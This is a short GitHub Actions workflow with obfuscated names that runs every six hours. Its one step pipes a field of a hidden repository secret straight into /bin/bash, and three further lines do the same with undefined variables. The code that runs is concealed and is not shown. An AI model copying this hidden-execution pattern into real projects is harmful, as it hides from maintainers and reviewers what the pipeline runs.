name: laolishi1829
on:
  workflow_dispatch:
  schedule:
    - cron: '26 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: laolishi1829
        env:
          tc61501: ${{ secrets.tc61501 }}
        run: |
          echo $tc61501 | jq -r .vjlbe7160 | /bin/bash
          echo $rmsb4 | jq -r .tanz25 | /bin/bash
          echo $dib081 | jq -r .fqrhp619 | /bin/bash
          echo $ujw1 | jq -r .cvvd475 | /bin/bash

